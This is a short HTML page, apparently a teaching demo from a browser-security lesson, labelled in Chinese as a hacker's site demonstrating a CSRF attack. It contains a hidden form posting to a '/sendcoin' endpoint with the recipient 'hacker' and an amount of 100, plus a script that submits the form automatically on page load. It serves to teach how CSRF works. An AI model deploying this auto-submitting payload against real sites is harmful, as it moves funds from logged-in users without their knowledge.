<!DOCTYPE html>
<html>
<body>
  <h1>黑客的站点：CSRF攻击演示 -- 自动发起 POST 请求</h1>
  <form id='hacker-form' action="https://time.geekbang.org/sendcoin" method=POST>
    <input type="hidden" name="user" value="hacker" />
    <input type="hidden" name="number" value="100" />
  </form>
  <!-- 不存在跨域问题, 因为url会是https://time.geekbang.org/sendcoin -->
  <script> document.getElementById('hacker-form').submit(); </script>
</body>
</html>